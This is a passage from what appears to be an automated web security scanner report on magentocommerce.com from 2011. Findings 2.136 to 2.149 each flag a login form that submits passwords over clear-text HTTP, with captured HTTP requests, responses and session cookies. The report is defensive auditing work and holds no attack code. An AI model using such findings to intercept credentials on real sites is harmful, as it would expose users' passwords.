Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fregister-for-training%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:13 GMT
Content-Length: 41049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.136. http://www.magentocommerce.com/services/testimonials

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/testimonials

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /services/testimonials HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175741; expires=Sat, 11-Aug-2012 15:02:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Ftestimonials%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:21 GMT
Content-Length: 36222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.137. http://www.magentocommerce.com/services/training

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/training

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /services/training HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/screencasts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170923; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.5.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171066; expires=Sat, 11-Aug-2012 13:44:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:26 GMT
Content-Length: 37516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.138. http://www.magentocommerce.com/showcase

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /showcase

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /showcase HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176322; expires=Sat, 11-Aug-2012 15:12:02 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fshowcase%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:02 GMT
Content-Length: 50996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.139. http://www.magentocommerce.com/sitemap/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /sitemap/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /sitemap/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176452; expires=Sat, 11-Aug-2012 15:14:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:12 GMT
Content-Length: 55319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.140. http://www.magentocommerce.com/support/magento-user-guide-book

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento-user-guide-book

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /support/magento-user-guide-book HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176223; expires=Sat, 11-Aug-2012 15:10:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fsupport%2Fmagento-user-guide-book%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:23 GMT
Content-Length: 39756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.141. http://www.magentocommerce.com/support/magento_core_api

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento_core_api

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /support/magento_core_api HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176236; expires=Sat, 11-Aug-2012 15:10:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fsupport%2Fmagento_core_api%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:36 GMT
Content-Length: 34959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.142. http://www.magentocommerce.com/support/overview

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/overview

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /support/overview HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176215; expires=Sat, 11-Aug-2012 15:10:15 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fsupport%2Foverview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:16 GMT
Content-Length: 37099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.143. http://www.magentocommerce.com/svn

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /svn

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /svn HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A5%3A%22%2Fsvn%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:21 GMT
Content-Length: 33351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.144. http://www.magentocommerce.com/system-requirements

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /system-requirements

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /system-requirements HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsystem-requirements%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:20 GMT
Content-Length: 34053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.145. http://www.magentocommerce.com/translations

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /translations

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  http://www.magentocommerce.com/products/customer/account/loginPost/
The form contains the following password field:
  login[password]

Request

GET /translations HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176425; expires=Sat, 11-Aug-2012 15:13:45 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Ftranslations%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:45 GMT
Content-Length: 81713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.146. http://www.magentocommerce.com/ua

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /ua

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /ua HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176554; expires=Sat, 11-Aug-2012 15:15:54 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fua%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:54 GMT
Content-Length: 73040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.147. http://www.magentocommerce.com/vi

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /vi

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /vi HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176552; expires=Sat, 11-Aug-2012 15:15:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fvi%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:53 GMT
Content-Length: 88806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.148. http://www.magentocommerce.com/virtual/download-magento/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/download-magento/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /virtual/download-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176609; expires=Sat, 11-Aug-2012 15:16:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fvirtual%2Fdownload-magento%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.149. http://www.magentocommerce.com/virtual/enterprise-register/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /virtual/enterprise-register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /virtual/enterprise-register/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
